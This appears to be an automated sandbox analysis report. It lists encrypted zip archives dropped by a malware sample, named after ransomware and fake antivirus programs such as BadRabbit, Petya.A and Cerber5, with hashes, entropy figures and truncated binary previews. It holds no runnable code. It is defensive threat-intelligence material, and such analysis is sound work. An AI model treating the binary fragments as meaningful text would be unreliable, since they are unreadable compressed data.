                                                                                                        Preview:PK.........q.Fn....j..U.......Endermanch@AntivirusPro2017.exe%..........J.....5T...........8..K....C....w.+.&. &3..MT&.D..$`u./e.R.r.....=D0........O..'..r...*..%..zu.....]nT...b8c...5.{....$WeHK|.Ocb....h.6#.qD.*Y.......\.t....?mI..;._..bm...........g....2....R.n.&..{y.......(..N.q.2P.\(.+.O..$a.w`.3...%.\1.A.I....qc......Ci..D?a......].....;\mk.(.F+....[$.p.|G.....<.b\...Y.z+7..^...3l.D[..(...=q..Rt.}........}t..$s.!Z.e...W..!..)....nbv...-.../....?w..G..[..eo.iKP..:..l=9..lk.R..Z.Fy.I..}T 35.....v^..G.{.%$l...~...d]/-..F.t.{0.lD).oH..-r...2.e{t.._X.................nA[.S..D.$.4..p.&.......p..L...:"..M&..H...8.....o....|....79.6R.....B.S/..w......NA3=...c.....T..[..2..I..&.N......?Bj8p.t...>7.*..}O|Y.u.......~..,...RM.wO..].g...>\D...o...K+..o...;b$..\.6.z..o.L..(.jD._.A...\..M....y....p...[v..7.8RPJ..y..RdH..d..%...w.!..P=.J.m,.....<.`;^.:"...dV.f?tC.2H.....q..t...(....M..L....C-..<^.../.ZC..h.4.u..w.+"..~.).0P.&...;2.._.....X.....YB.I._~i.bc,....
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1410736
                                                                                                        Entropy (8bit):7.999854281040059
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:24576:oSL6Ntp05P6ftXeQAPm1sPj54cubcZDUPKrFusldmR8uCbdfxgEgL+xTbQDE5GYJ:oftFtXr85409usl8R8vJgEdCY5n3Rv
                                                                                                        MD5:E1AC4770F42BAC0E4A6826314331C6EA
                                                                                                        SHA1:66493386AD995819871ACA4C30897B6F29AB358F
                                                                                                        SHA-256:EABF7FDD31C5838D66CCBC3CA52B0F6EAF8120F83EED43F372F21E4D31734B73
                                                                                                        SHA-512:E691103064075B24B1FC2F5B4D1A1C2701EE7C5074C96A7FAAF284F975DE3D7309E7A3EA9B80FB6A2D8950A3B12ACEB22E3516777508CAC70CBA8BE48527F55C
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK...........CF.\.............Endermanch@Antivirus.exe.z..o_+.....#...mg...$.YW..G.pCot.s...$.....R...a..:.....c.l.?.,r.)i..I...z.0.2F.5..b.F..Y..].C...po...".....(..>G..M6."7.~..}....VCb.._.U.L...........6o...........#A.[..1.......=..}.r..=B ....o...h.z.....c..h.o[.b...v%m.K..8F..~.m...]..../.i.d.B..]..........}.....2..z.n'....y.Kqx.3:%NEg@..._%[P.l..zp.....ai"...^L|......!X.....A....{...:......%..?.y.....=.R...} Q......K..0.n.Xh#.t.\....5....[~ZdF..%.T..j.n......?a;U..XO8.k..+...Q+..7...Mg...V.\...>........4...P.B"o.M.o.jJ..?.|h...<.....V.F/i.ru..L`(1.Vv.sd,.BD{s.t..+`.s.....m.b.9eh.... .3.../..T.q.: ....PZ....:v:o....wAV..s.....C......=..+...i.j. .G.1.U..D.zH+..}.k.!......q.....D..WL......7..L... .F....'..7..!...]!.:......tm,Q.DC....&.Vg..Q.A.\.;..>.[|l:...&Z.n...C...(..J3.O.*.....0.5..~.H...q.q...f..hI.4....(.V....:..V...}..2i&.?..U.?F....d.E....-tb&.U.HE.......1t..d....d...]....f."..%..Y'rD./.....p)......{..i............1.c.5)..Q...QW.pE
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):402632
                                                                                                        Entropy (8bit):7.999545291816681
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:12288:KPd6ZnyRPZJhKymLkH+yDXZEyfMrvDca6:Koy5ZJ7BeeXmb8a6
                                                                                                        MD5:61DA9939DB42E2C3007ECE3F163E2D06
                                                                                                        SHA1:4BD7E9098DE61ADECC1BDBD1A01490994D1905FB
                                                                                                        SHA-256:EA8CCB8B5EC36195AF831001B3CC46CAEDFC61A6194E2568901E7685C57CEEFA
                                                                                                        SHA-512:14D0BC14A10E5BD8022E7AB4A80F98600F84754C2C80E22A8E3D9F9555DDE5BAD056D925576B29FC1A37E73C6EBCA693687B47317A469A7DFDC4AB0F3D97A63E
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK..........XK.._.$..+.......Endermanch@BadRabbit.exe...IS. ...l.).......m.._.7..FS.yC.h.-o.l...4.7FO.....?.X.>*k..Q./+._U.x@...SF..2...!7^F.v=.e.........*.SV....an. E..af...RK.z_VM..E......,...N......xD{~....t..r......o..4....i_p....S..:2.....(.b..=.7..A...'`.........1......5b..k..j.B.@.N~..r"..:.e#.`.....?`..K.).....ll....NC.!...... ...u`...b..$..SM,.].Z.Po...W,Y6....S.q...{...y..V.C&.][.T7....].l....=..."=$\..!.f.....Rc......fU.......Z.tu.....pJ.|.....:.m.~....z....7_Z.&<...&7.w.?Q.*rq. ..E.k.a.m.`..b.$z.i.w...Gwe.,r.H.rB6..)./[?...O.z....w.~.nO7"O./L.mM.,-.u..${.v85.ff.ob..a..}...:.pBY4f...D.WZ...Hf.*..62..>...9....._r:QHZhX..0.n..g...[q.9...f...,.WcWLii....N..".....hsuD.....[...^.._..z.!.}m|..o...L...?54.P.2].$Y.......K z.....*.;Z..F.........]......k...*.4Ud.$.E.N.d.~...}BD..xg+.g....>.{.U..hkh...&...\...f..7...u1..<.Z....Q.......RF1Y.O~..3.....RM..;bq./D.g.'.y...QRVz.!.\w..!....I.L..y....U.V.!;*..7).0/..5D.M..y.....{....g...Q.%|.V4,_k]3
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):116134
                                                                                                        Entropy (8bit):7.998443688728203
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:KS3AAMRbzhdikdvWC5PWTAiloSQOE8rzl7YP++bA4k5:KgkRbPrdsAizPLy2+b0
                                                                                                        MD5:6CA327B67F1A2B2A4FBB7F342E15E7BF
                                                                                                        SHA1:AAB4A7D8199E8416AD8649FEDE35B846FC96F082
                                                                                                        SHA-256:460A3E3A039C2D0BB2C76017B41403BF3E92727269F49B08778D33108278B58F
                                                                                                        SHA-512:B7A7574CA52885E531ACA71EBE52F7832F8A2436CDA047E7686936FE0337EAE7C4EBCC57DF27C26316871D4167EA4E6794BEB933F7C13EFB0ADDAC0D400E4D9A
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK...........?...............Endermanch@Birele.exex.Rz..Y.n..].&m|.f..[...t0"...!..}.[..[z...I...hk.H..B.T...........2dP;)eK.t..i.o....S.Ct_;Y...Y..q..D<....{..b......kI.y#\-..EGm._.p..~M...\...f.`...,..e2p.._X{^..".^..~m......C...2.r$...9>u..&&.....(@.....=..<5.....yUT.W<UDAw..(.+..r.......e.........0.....e,.]b`........_.~./@..6...&...p./-.2Ug...+......H..bZo.M.....^.'m,../..#..7....0.<c.b.Cl.Y.a...#....Z_.g.y.BH...HOY.cw.u.. .4\y...c..i...5.P[oW.1.|]Il.d\..s...T..%z.h.).....6W.-lGu..!.q5......!....;..m".z.h.>,..s.SF6...........L..Vv....V..C!....^.U4h...A.g@I<......`..r.#.0u..O.,..".4.....N.C.*5!..N,).lGy.*.6.S....Ox__d.........$..0G..^ <u[.& )...!.=............E.m..w0W...)..D....;Bs...".4...o....]...>d..p.L.'..&...{.A..N..n...$,m.h.*..i.,.lcP.m....NS..L.k"_.Ua.z..!T........S.}....}?b.h.Q#.....D(..%.l.....).I.uZ.R..:Ut..7"....#............7.jN...q5=.=a....\K...&.O......A.J~.....'.D..A..p...).....J_a...t\....."H.*... !.W.Y.>.#?...%AO1WkK.....b.1.h.
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):185620
                                                                                                        Entropy (8bit):7.999024397332973
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:1rdfCdJA9AZODSf1MIH34E8Ylcg16hK1z0mZiPS6weJ2vbYEzoN:LfuA2D1MIHl8Ylt151z0mZiPSM2vbY7
                                                                                                        MD5:10D74DE972A374BB9B35944901556F5F
                                                                                                        SHA1:593F11E2AA70A1508D5E58EA65BEC0AE04B68D64
                                                                                                        SHA-256:AB9F6AC4A669E6CBD9CFB7F7A53F8D2393CD9753CC1B1F0953F8655D80A4A1DF
                                                                                                        SHA-512:1755BE2BD1E2C9894865492903F9BF03A460FB4C952F84B748268BF050C3ECE4185B612C855804C7600549170742359F694750A46E5148E00B5604ACA5020218
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK...........JW9.Zb...........Endermanch@Cerber5.exe.e...@.V..j.y.,yY...8..T....z.)..nI... ....~r\.......5r|....$....}<......=..@.:...`......:..wa.D..}..-(8\.O.&~...H..~S.O.).2._.}...E...n&J..?....;....v+...M..N.s./c.'A%.O.^p..a.....(+.)....e1A..E~.....D...2...y..,L.8Xh-......X...G..)H. p......u..U.M...%..hDOS#.s...W.2%'m.$u(.zA....C.W..<.b..8.x.?.......k....$..a...$....~.oF.rX.i.... ...#..{i.&...............iM7..%.....jc...b=).d.WX4?.....[_....p.1x.H...U.a..$.V..../i.$5.C.L.]sID.D..G...53..q:... \....N.\@6...F.R...Ui.=h"Zzh...V}..o.h.W.!$] .P>...kA..x.m......[...=$z.....8.3.U....G...1.<1].Z. ..L........3z....BW..oQ...+.v...BKe..V..C.....p.a...p(yu.&ip.....oC..`........O.$%..|.=..;X..."49..w..t,.Rp.Y.Z<].F\.ry0@...j.b...?.(....D.!%!gP....Qn...B..{.."K.w....ZA....l..._._...>)..Rm.@.1?.3.....DM......3M?..,.s/..N.<..).+[..n2?.6gH).v.>C.0...J.f.&.iF..%.d.|.>8u..9A.>./.U...U.+..0_".V.......%....kCi0*)L..M.Jq........R>.CA.oBOPI..N..\o.PoV..
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):215551
                                                                                                        Entropy (8bit):7.999084540418597
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:6144:rly5xPXQYQtWnwNRIPbk7DLJSa/tJru36a6fijJ5/j:rly5xPXQQwIY7sax75fizb
                                                                                                        MD5:016D1CA76D387EC75A64C6EB3DAC9DD9
                                                                                                        SHA1:B0A2B2D4D639C6BCC5B114B3FCBB56D7C7DDBCBE
                                                                                                        SHA-256:8037A333DFECA754A46E284B8C4B250127DAEF6D728834BF39497DF03006E177
                                                                                                        SHA-512:F08653184D7CAF48E971635699B17B9502ADDB33FB91CC6E0A563E6A000AEB57AC0A2EDD5A9E21EF99A4770C0DBB65899150FA5842B0326976A299382F6BE86E
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK.........D.I....II..........Endermanch@DeriaLock.exe.^..N._9>.........N..Se2..5y.....g.i_j..dvp.j.K..e.6..-..A..'....Q..8..#j.O.....#<.w.D...<.._`06.W...!....K..,...yu.Be.i...X.;r.+...".`..........$.6..J~..Vd....L...{..+.,...8ly\.S...i....<t..^.l..{[.v.a\.p.E.....]MK.+7_N&G.TX.3F..`..<I....,\....G.8...O^.?..W#.......r..T[.<V@.s......<.xc....~.&........|.;..i.l.A+.N.b.....t..te..l...4....+.q+.F.X.:....A#.AA..U\k....M.L.#...N.".p....2..j.^.(v-.*3'.....e...:....,S../...r..z...`...]..G.....`.k.^...y..i.S....2..9.P.B.X..Q.`.]..........}kd...f.c...r.;j..{x8....,....RK.-Bc.7mv..a1.#.....c.q...Y...7.To...6I6~...s.W3.M...w......h..*!...C}..H..v5....|9..<..q..`....Z...2"..I.:......8......Hw.>..5.7*.2..{EGV.l.s,.xg..CK.................q....>..x.F.>...\...n..!.*/L.G..@g'...h.K.V.g....,....t.F.;U,b....3...7d...6l...8.kQ|.-...N.1......q..i....0.>......2..9.L.>.>...q.O.&..o.LrUL..{d..!e8.9..1....(T.....|p..T.?...t...{H.....M..P..\Rw..c...*me;..}.wd......
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):179477
                                                                                                        Entropy (8bit):7.998951302367822
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:5oVnkybquxcF6U/aVHOBuv7j4/rIUUT4iI5mflT9xuUqywFdiZS3e:5oV5bZxIsV4l/kz4iFh98UqywKw3e
                                                                                                        MD5:6D8C9D01BA5C32AEDC734087CC3D0B1B
                                                                                                        SHA1:F7E58E5EDD203ABC2364922B11B6641D3EE9ADD5
                                                                                                        SHA-256:92E885D1763E4BA1ABC92BEE9B08CA7A2AE358BDA5FE98B31A8E217327982BF7
                                                                                                        SHA-512:090B972E7D854DEE8C1DC45EE3035247EB8AB641C337FF8DA6DC3DBB84FA447DEEE688F760D36FDFB93CCA50D4AB27B5AB3347F75C5E4207A06E0ADA0607E3F7
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK..........MF..D.U...H.......Endermanch@FakeAdwCleaner.exe.cM2.N....,[Uo.a...#.M.]9(..xG.+...;.0.oT....L....8,..#..SK...n."g.N..[....[........l...F..f RI.Y.;.....L>..ob......k=...Ps.m.`$.....]5Z.F.S......\.fC.k...cp..{.`...u....:.#j.!.d.m.FV.....@X....Q.^....s7..Ml..d~9.y..A...U..J.).I..t.m.M.kg.E)....Me..`..<D=.1P."= ..2q.X...{.........)pcx.$..ZU.....$..|......k.st.E.v..r..{8.d.%..V.!.n....<B.9......?n#Z.U.........Fs..O.^ {.G.R#.]..5..Z....H@64............:+9#5P..J9......D.N.F...j..J...M.bJ$...B.B..(.&7...E....g]sC.L{].-...Th+..f..7.zI....h..k...:?B.!........C.....{....?...35v..........8..f).apaP.....*:....'.....Y.6u.>.?...6........G.s.<....j......-..tv.....H1i.Z....`....`.N .f.c0.uc.../..M ._T..I..Q..6....X..'`3..N..EdU..^....|....EM5.q...Do.....~9.toC......".ZW-...?..&P.....0....f.n.L.ti.Y.....QB....[/..-.M.7......P.....Q.)..!..A...../..OS9.gp....-.:s.$.&sv-\....S....W/~...Y@q..ada.* k6...d*...x`e...\.q.&}./,....i.9.;.,.3...1..}.Url........M"
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):203087
                                                                                                        Entropy (8bit):7.998965133479219
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:6144:gEXMZKhTuDA9rBNxIzdZgNbSEehM1Kq+i:gVKNuKdIzcNbxD1f+i
                                                                                                        MD5:3500896B86E96031CF27527CB2BBCE40
                                                                                                        SHA1:77AD023A9EA211FA01413ECD3033773698168A9C
                                                                                                        SHA-256:7B8E6AC4D63A4D8515200807FBD3A2BD46AC77DF64300E5F19508AF0D54D2BE6
                                                                                                        SHA-512:3AAEEB40471A639619A6022D8CFC308EE5898E7CE0646B36DD21C3946FEB3476B51ED8DFDF92E836D77C8E8F7214129C3283AD05C3D868E1027CB8CE8AA01884
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK........d..LZt.7............Fantom.exe"..[.m1...}.U.3.*..:\..]7..n[.=Z..m.E.......h$.\@.M....~...+..._@&=ds..z..tbV.k..f...!5E\..._a...A...r...r6I..v.-S.....I...._..?....b.Bg.....~..PK.z,.D..B...B..<.'.|....z.....J.`@.a..../^0h.9.s.41di.b...=..,....d.HplX.=.%.a.Y.J.nrS...Vk.;K.7_.lvCx1....I..."....k.....me......pT....P.f7....~...{v.u.4....3F....4.].$....2.4a..-`......&....$......;3. ..6......d.....lg.P.o..^.1.R7y%O.....x......:...T.(L...2.....}...E..#.. .0.G.Z.^.p..vN.m{.........P..!...a..u...8..:.....>.0.~...f..dz1L.0..Bu<.h..v...BQ{...W. .`....I.Y...s<s..X..3.N.8........^..q/}.+.\i.Y.....l".k..e....AS45k...Y.o...[.~......#..G.b..f.c..|.cKe"b#..;..O.#].H..H......~...Rc...j.....8..1k..u.)hB.*..S:...C.;.e.H......|.O...:..v+...B.W[....<^..1....l..8....n(.....R44.&v..0v_az.s$...%...`Fp...0^..5...xg...eSO.FJ..,..-.........7T).J...LV.xe.#.P..8%..P.8..2.......+8D.j.xMY\x>..Erc.ymj^c*...^.h....E.A..;.`....'.i..R.. .W5m..!...&4.K...O1.?.8
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1721302
                                                                                                        Entropy (8bit):7.999903232734228
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:pe9rvkVDuuk8/JWXY/+XyxN7kHBRcuA7/:pedkVDuuk8/YIsy7AHE
                                                                                                        MD5:974918541AA75F380AA6CB4D8BD3C4BD
                                                                                                        SHA1:D0A6A3A301CF5330B00281EE8FF04ED9C3455FC7
                                                                                                        SHA-256:D703FC0DE3F07684528BC1931479815A4B9CD7B66FEDBB753CA21314A6A300D6
                                                                                                        SHA-512:DB829BBA3372A6E452D03D24E998EE91D28E3816C9D1A8D81330D450B24DC695E15D2612EC69729BEAFB28D95271BA55B6BE8B95DBE7F4B15F4F65BF5B5279B5
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK.........43L....C..........Endermanch@HappyAntivirus.exe.+...)hK..H.; N.:N...HU.2.....|........xbpeu....4...st.,O"...2...$.W..1V..a...>.\f.#p.\...$...<m..Z..:.a..z...Bp.b.B.P..pOZ%r.......J..&){.n..E....s.+C.X.._......c.fj..x+..p.X..U.:./!]}..t.b;..i.x6.bs....Z....@.0..k.v.&N.J.rlS....I.ig5.Ph.~......!O....y6..Kt....<..gR.V^.{...#.k|WTc..5.I.>..u.a.+..uo.!......b.o.%.<!f`:....^9U.5..e.&..aY..z.x../u..a.p..>`.jo,)..t3.)L..i..v....C:.....3..M.&Q0|H...}.b$..&....LP....n....q...\ez....}....B.=.>x(...q..kX.....=.;Sg.t..3.....be../k.w..<.q.i3..#\.:...i.j6..d.........,H.G5C%..W.E...Lm.|.....'...".{.7.z.X..m...m.2].Y.......8F...d..R..Il. .U..}.....P..!....1H:.,%=3.H..?..fD.K.....F.5.+T.c...g..N*1g...}1......,4.x..T...........K.3.....F.-..*..|.".[..Z:.%?....jy%....]..;o2zYY.p.1....>.8;......n.%|$.;px}..N.%...y.0.Z%.~.....f....@.3o|....nGE-..{2..@...$$..3[.....*.o.p.+....3.0[..../..v..(..%.@.......|...<X..........y_.f ......oKAN..F8..
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):34300
                                                                                                        Entropy (8bit):7.994524271759185
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:xaTvxO0nJFcoYFY5Hn8tuWRHkD+unrGRcd0zOF9MzKh8yK4ZJy9ELob8a:EtOoJFSzt5BiGGmObB04Z09cobl
                                                                                                        MD5:5569BFE4F06724DD750C2A4690B79BA0
                                                                                                        SHA1:05414C7D5DACF43370AB451D28D4AC27BDCABF22
                                                                                                        SHA-256:CFA4DAAB47E6EB546323D4C976261AEFBA3947B4CCE1A655DDE9D9D6D725B527
                                                                                                        SHA-512:775BD600625DC5D293CFEBB208D7DC9B506B08DD0DA22124A7A69FB435756C2A309CBD3D813FC78543FD9BAE7E9B286A5BD83A956859C05F5656DAA96FCC2165
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK..........UMs2..>....L......Endermanch@InfinityCrypt.exe..Z9.o.KV.o.xug.]....Q~PY.QUkUH..:.TZ...E.(Y.N..n......)..#m....@....l.8.k..\.W,V8w...qU....N.|V.NtQ*.#2.YoP..S;.}|)..N.1.'?.....0e.aI.M..R..Zr..=}9.T+.....@]...Y..)!..z..b{......k5.C..WCU...no... |E.g.y....k.T......\'.O...7":s..D.m.L0....[I...`7.FA^.*.;...s..Nu.)...*7.E..L...U!..N.p...PG.C/...g...,...k.O8._...=...W.....%.-;.....,4s..ma...<+.h.0.....9A......&.].c..C`.?fQ.....g..R...>.....wF..0..x..vBIF;..m.s.E...d.R._=..i^dVV..Tq`...w.b......i...5..G.....|:|..k..l.....*..<..L.]...AV...t^,>T.nLW8W...pP.U..}..K.J]j....pc.2..d'...6.t..~...s74.K0M{.......ninG.lf|S.y3.t_.."9...kjG)..(.P...s\.......x%;....-d;...S.Y,.......-.... .1.D.S.....Q.<..2.6,.t......2..F..!.a.V......-=...t..S./....~..K.<..]f.ND...........U.t>.8[{.?...F..f...AQM`.+....K.m_JN...n...d@...G...w..k.......EY..?0./<......!...m<.<..@.42.....).)+..+...[HM..-Z~.X<......U............0w#...r...&.}.../3.t|z.........rmq}G..P...o.
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                        Category:dropped
                                                                                                        Size (bytes):26359
                                                                                                        Entropy (8bit):7.99208020012939
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:gGkaFGuW/1rmxspfsYEOgDGjvZIxvTAd7i6BoBTYpk1:xhQBoSgDGDZQ0dhyj1
                                                                                                        MD5:1AEA5AD85DF3B14E216CC0200C708673
                                                                                                        SHA1:E3EE16E93BA7C3D7286DC9EBBAF940F0BCB6CAD3
                                                                                                        SHA-256:8DFA496C93680ADC10E77C0946C7927D3E58D79900013C95DFCA3411D766BD16
                                                                                                        SHA-512:06FAA190350E4558C6D4F1F201DC0698587495897593AAEAC16F3EA3D8C1C7F81D65BEEA6BC7E730CA1DF9BDFDF3CD2BCC84BF50F64787E0B1DBD21492796F36
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK..3...c...8..../f..).......Endermanch@Krotten.exe......AE...Q....>,.....}./A......r.=..@Nz....RGCZ.....{..H*.8..i..N.."W.+...@.;E..f....".l.t.f..rj..M@...V.Z../.i^Z.D...JX...J.m.5$F.Q...J..x.rF.....H#,:..t'..7...JKQJ.=..u\..M,.d.(<....,).dJ...~.Sg.......2...>...&Q}b.IJ.%`?6.~f..*......c.....a.f3...q......l....G..1`U...\..........e.Aw.R}W-s8.(.^..|.L..6.Q..N.2'.~..g..o.vQ......q.okL.4|*.#>"..G.0fN...L..b.*...pB...T%.BP],.B.RsRCa.....v..O.y...7V.......]4..q.n..{...........w-.}.oWT.v..c@......{.$....M^wC...Z..*o.p.].z...-xKd...{....P.T4/....n...B.+.JNn.LB.Z.`9E9".#g...v.'%..H7.f...l.I]e<q..C.D..x.G....=...zG.S.Q.+....iRS:..F.....S.8.A. .tH...Z-..x..U).......k...<...;^1..6..}AK.#......HI..@.X4.h|9V.^aZ.#.....B..P.|...gk...n...\-.....3..:P....Y.....^.....j..Ty..|{.%=Xt.;..Md..A....B}.0.K.T.....(.t..N..o...aU.`...HC. .)....<%.=%.....`....9j.<.Z..3k.^_i....!..s.3'.UP....3.Kc.].=.......c..-..k#K[.....{;...Oj...#Y..(.+k...D.F,..R.Ly.@.t.m...C..
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):938498
                                                                                                        Entropy (8bit):7.999770835729866
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:24576:+FhIdZxByAl+XiqNk6n3DaeCTLD1yilc7KrBVw1lFVFDqE/zQRsAOfySS:AhAgo2ikhryLD1hcerklFVhqEMiAuySS
                                                                                                        MD5:F315E49D46914E3989A160BBCFC5DE85
                                                                                                        SHA1:99654BFEAAD090D95DEEF3A2E9D5D021D2DC5F63
                                                                                                        SHA-256:5CBB6442C47708558DA29588E0D8EF0B34C4716BE4A47E7C715EA844FBCF60D7
                                                                                                        SHA-512:224747B15D0713AFCB2641F8F3AA1687516D42E045D456B3ED096A42757A6C10C6626672366C9B632349CF6FFE41011724E6F4B684837DE9B719D0F351DFD22E
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK...........J.i..FQ..........Endermanch@NoMoreRansom.exe.&P....\..J..vt.D('..i...!.}..V./.d..i...^..j...V.......dk?..o#....}.6.F.......IZ+.~.H.l.o.....z...r..TJ.^.1.7..b&B.@.C.....)...34]...~...m..Y...}...P.r...>.z.....".4T.>.........\..?..E...z....G...u..4...;"..;8.|.....*...Z.k.4....G.V..x.Si.%...K..Q.6.......+Y.?...m......{,l...Xe....C/W..$...j.,(....4a .1.'..f...3lG8.{..z........H]..N8.H...%g.....V.`.y..f..Y...Q.l....=*....p....x.o.".M%...L.fc......Z..".C.`.oU.......e.......S.G.n....L.j@..Y....^......E$..l.$...&......4...h...x.9U....d..9..-i.zt7.>....hJz...=.......p..1AEd....O..y....m..6.[.8 3..u..q[.i.K..d.a...H4*.]....#[.....=.....y.Y9......K_L4.7.....Y.@..}.T../.B.G.&`.......s.,.iQ.P}..O'~..5e...L..~......x'M..l.<.x.s}|....Jq.........Sv%.M.Q.!?....L....^24<..eP]..*.crf.&.....J.o..;.w(..5]..>.Wc x...R......J.X.>.XTU....".....p...[..v.E...V....~.....<...K........Lfm`..3M?....G.....J5.d..~...a.#...1......i.@6..?.c+.....?r'K..0.~...L.s.[
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):131293
                                                                                                        Entropy (8bit):7.998685171989688
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:7P2YmowJWNmYv5lnTc8R+igbpBgBXtzXW4Dg/PJLDEuUYBAald:r2YnzNmYBlI8hgdBgBXpXxDg/PJLDEH4
                                                                                                        MD5:1559522C34054E5144FE68EE98C29E61
                                                                                                        SHA1:FF80EEB6BCF4498C9FF38C252BE2726E65C10C34
                                                                                                        SHA-256:E99651AA5C5DCF9128ADC8DA685F1295B959F640A173098D07018B030D529509
                                                                                                        SHA-512:6DAB1F391AB1BEA12B799FCFB56D70CFBDBDE05AD350B53FCB782418495FAD1C275FE1A40F9EDD238473C3D532B4D87948BDDD140E5912F14AFF4293BE6E4B4C
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK.........t.I.w.H+...........Endermanch@Petya.A.exe.i?mj.P.........N.d|....>.c.....%..N.....I....7{.F.O...2.wT:..g...dg...{._:....`.....L...jR.0.d,...5..!....*u6...N.n8..R..{.d...|.{.........[.....y.f..!.f.A.........nl...}...@.....X....6.....7...o...(:\....D.N5.h.Y...78&...U....EA......A.5l...[......_6'..F$...[.~qut...X>1n..4.S...~.[._|/..n...#....j5......N...Y{WwD..%s.Vo....T7Wn.jIRq].*!..Ky...la.-^.}..j.s^^s..._.....r.E.........9E%NK?..%.....IGf.y.....<Ok.E._(.sW.G..O.%.)`.Iam..b.j.l.g..~.W....|...c.L.....k0...a...`.q.sls...........1.p.....^....TRq}..0?...:..VU...#a..+.1f...9(....0.+\}.j..~.0.#.De..mk.$......X..1.......p....q&.._.<.j..e..6/,..D.G....c..v......47..jd...q.....eb.z.........x.W.h.M...M.8.x;....<$StHq....k..AP7...k...........X.5m..O.%S.Y....?m.6.J.#...7s..=.4.*....p^g.A..y......3P;.=C.mc.id.n$..D..np..f......_nQ.W.J..+.a.....s.l...;@.2.,B-|W..,.......U.r..n..WB...2..@SE=..A...V.& F.wy6.q....O$...z=6..*.....+nD#....i.C|f.-...~^?...
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):133759
                                                                                                        Entropy (8bit):7.9985193464243505
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:veAhzA234eL3kq97n2PxqzYwiYjeKPdwekrkb:veEhJ1keyKPz
                                                                                                        MD5:7A5AB2552C085F01A4D3C5F9D7718B99
                                                                                                        SHA1:E148CA4CCE695C19585B7815936F8E05BE22EB77
                                                                                                        SHA-256:ED8D4BB55444595FABB8172EE24FA2707AB401324F6F4D6B30A3CF04A51212D4
                                                                                                        SHA-512:33A0FE5830E669D9FAFBC6DBE1C8D1BD13730552FBA5798530EEB652BB37DCBC614555187E2CFD055F3520E5265FC4B1409DE88DCCD4BA9FE1E12D3C793EF632
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
